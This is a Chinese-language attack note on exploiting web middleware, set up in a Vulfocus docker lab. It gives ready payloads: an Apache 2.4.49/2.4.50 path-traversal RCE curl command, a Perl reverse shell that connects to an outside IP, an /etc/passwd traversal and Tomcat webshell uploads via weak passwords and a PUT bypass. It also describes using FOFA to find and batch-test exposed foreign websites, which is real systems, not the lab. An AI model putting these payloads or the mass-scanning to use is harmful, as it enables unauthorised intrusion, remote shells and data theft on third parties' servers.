前言
了解常见的中间件 : IIS 、 apache、nignx、tomcat
环境搭建中间件的安全问题主要就是实战以前发现的CVE漏洞
环境搭建 上个笔记有如何在kali进行搭建docker
准备kali 已经搭建了docker
sudo docker pull vulfocus/vulfocus:latest
拉取镜像
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxxx vulfocus/vulfocus
启动镜像 run是运行 -d 在后台 -p 端口 -v是进行挂载 : 后边是容器的路径 意思就是把容器的内容映射到本地机目录上 而 -e是设置容器的环境变量
注意这个 ip 0000 是你本机的ip

里面有个log
apache框架下有利于价值的CVE
1、RCE命令执行
应用于apache 2.4.49-2.4.50
我们利用漏洞之前先找到这个漏洞的中间件的版本
正好是在这个版本的
利用exp进行操作
使用服务器进行curl请求
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
抓包改包修改
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
利用exp进行操作
这个rce框架漏洞我们可以进行全网搜 先使用 fafoviewer生成使用fafo搜索的信息可以去批量的测试(这里测试的都是外国网站)
fofa语法:
这边只导出10个是因为我设置的最大导出
2、目录穿越漏洞

curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

可以直接访问
tomcat框架
1、弱口令爆破
这个就是利用tomcat登录弹窗的弱密码
之后需要getshell
骚操作: 冰蝎生成一个jar木马


和gzl有很明显的差别就是开头没有system

这里让我们上传的是 war文件


压缩一下改名为 war

http://192.168.248.132:11374/shell/shell.jsp
连接上就行
2、文件上传漏洞
Apache Tomcat 7.0.0 - 7.0.79



然后复制木马的内容到这个请求数据包的下面
发现报错404??????什么情况 是因为我们后边的http把这个1.jsp当路径处理了但是这个网站内部是没有这个的所以报错了
绕过方式 : /xx.jsp/ //进行包裹

就可以进行连接了
3、文件包含漏洞
Tomcat 6.*
Tomcat 7.* < 7.0.100
Tomcat 8.* < 8.5.51
Tomcat 9.* < 9.0.31
使用
这个工具是py2开发的
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
weblogic
没什么好说的就是工具梭哈

天狐工具包wx搜 狐狸即可下载

点击检查 如果不知道是哪个CVE就一把梭 知道会快很多